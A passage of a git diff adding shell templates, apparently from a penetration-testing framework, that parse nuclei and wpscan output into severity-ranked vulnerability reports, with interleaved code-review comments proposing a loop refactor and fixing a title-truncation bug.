+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="\[low\]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="\[info\]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+
+cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
\ No newline at end of file
diff --git a/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTPS.sh b/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTPS.sh
new file mode 100644
index 00000000..835dfb5f
--- /dev/null
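Review bot: The five severity pipelines are the same line copied with two substitutions, and each carries the copied oddities along: `2> /dev/null` is applied twice to the same awk command, `egrep` is the deprecated spelling of `grep -E`, and the `$50=AWK_TARGET` assignment-as-pattern only serves to gate output on `$TARGET` being non-empty here because, unlike the wpscan templates, `$50` is never printed. A loop over a severity→priority table keeps one copy of the pipeline and makes the field assumptions explicit; the `$FILENAME` expansion must stay unquoted because it is a glob over the per-port nuclei outputs. The HTTPS twin on the next line (`Nuclei_Vulnerability_Scan_-_HTTPS.sh`) has the identical structure and the same note applies there.
```shell
# … unchanged: AUTHOR, VULN_NAME, FILENAME, OUTPUT_NAME, GREP_OPTIONS …
OUTFILE="$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt"
rm -f "$OUTFILE" 2> /dev/null
# assumes nuclei -silent lines look like "[template-id] [proto] [severity] url": $1 is the id, $4 the url
for level in "critical:P1 - CRITICAL" "high:P2 - HIGH" "medium:P3 - MEDIUM" "low:P4 - LOW" "info:P5 - INFO"; do
  MATCH="\[${level%%:*}\]"
  # $FILENAME is intentionally unquoted: it is a glob over every nuclei-http-<target>-port*.txt
  grep -E "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null \
    | awk -v PRIO="${level#*:}" '{print PRIO ", Nuclei Vulnerability Scan, " $4 ", " $1}' >> "$OUTFILE" 2> /dev/null
done
cat "$OUTFILE" 2> /dev/null
```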
+++ b/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTPS.sh
@@ -0,0 +1,19 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Nuclei Vulnerability Scan - HTTPS'
+FILENAME="$LOOT_DIR/web/nuclei-https-$TARGET-port*.txt"
+OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
+GREP_OPTIONS='-ih'
+
+rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="\[critical\]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P1 - CRITICAL, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="\[high\]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P2 - HIGH, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="\[medium\]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="\[low\]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="\[info\]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+
+cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
\ No newline at end of file
diff --git a/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_1.sh b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_1.sh
new file mode 100644
index 00000000..24e8d1ec
--- /dev/null
+++ b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_1.sh
@@ -0,0 +1,12 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Wordpress Vulnerability Scan - HTTPS 1'
+FILENAME="$LOOT_DIR/web/wpscan-$TARGET-https-port443a.txt"
+OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
+MATCH="Title\:"
+GREP_OPTIONS='-ih'
+
+rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="[+]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
\ No newline at end of file
diff --git a/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_2.sh b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_2.sh
new file mode 100644
index 00000000..267cfc81
--- /dev/null
+++ b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_2.sh
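Review bot: In the `Title\:` pipeline, `cut -d\: -f2` already discards everything up to the first colon, so the awk that follows — which prints from `$2` onward — drops the first word of every title: for a wpscan line of the form `[!] Title: WP Super Cache <= 1.7.1 - ...` the text after the cut begins with `WP`, and that word never reaches the report. The `$2 " " $3 … $25` chain was evidently copied from the `[+]` pipeline below it, where `$1` is the `[+]` marker and skipping it is intentional; the `-f2` cut additionally truncates any title containing a second colon, and the fixed 25-field list both drops the tail of long titles and pads short ones with trailing blanks. Keeping the whole remainder fixes all three: `egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d: -f2- | awk -v AWK_TARGET="$TARGET" '{sub(/^ +/, ""); print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTPS, https://" AWK_TARGET ", " $0}' >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null` (this also retires the `$50=AWK_TARGET` trick, since `AWK_TARGET` is already in scope). The same applies to `Wordpress_Vulnerability_Scan_-_HTTPS_2.sh`, `_HTTP_1.sh` and `_HTTP_2.sh` on the following lines, with `http://` in the two HTTP variants.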
@@ -0,0 +1,12 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Wordpress Vulnerability Scan - HTTPS 2'
+FILENAME="$LOOT_DIR/web/wpscan-$TARGET-https-port443b.txt"
+OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
+MATCH="Title\:"
+GREP_OPTIONS='-ih'
+
+rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="[+]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
\ No newline at end of file
diff --git a/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_1.sh b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_1.sh
new file mode 100644
index 00000000..0bd09ddb
--- /dev/null
+++ b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_1.sh
@@ -0,0 +1,12 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Wordpress Vulnerability Scan - HTTP 1'
+FILENAME="$LOOT_DIR/web/wpscan-$TARGET-http-port80a.txt"
+OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
+MATCH="Title\:"
+GREP_OPTIONS='-ih'
+
+rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="[+]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
\ No newline at end of file
diff --git a/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_2.sh b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_2.sh
new file mode 100644
index 00000000..28c956f8
--- /dev/null
+++ b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_2.sh
@@ -0,0 +1,12 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Wordpress Vulnerability Scan - HTTP 2'
+FILENAME="$LOOT_DIR/web/wpscan-$TARGET-http-port80b.txt"
+OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
+MATCH="Title\:"
+GREP_OPTIONS='-ih'
+
+rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="[+]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
\ No newline at end of file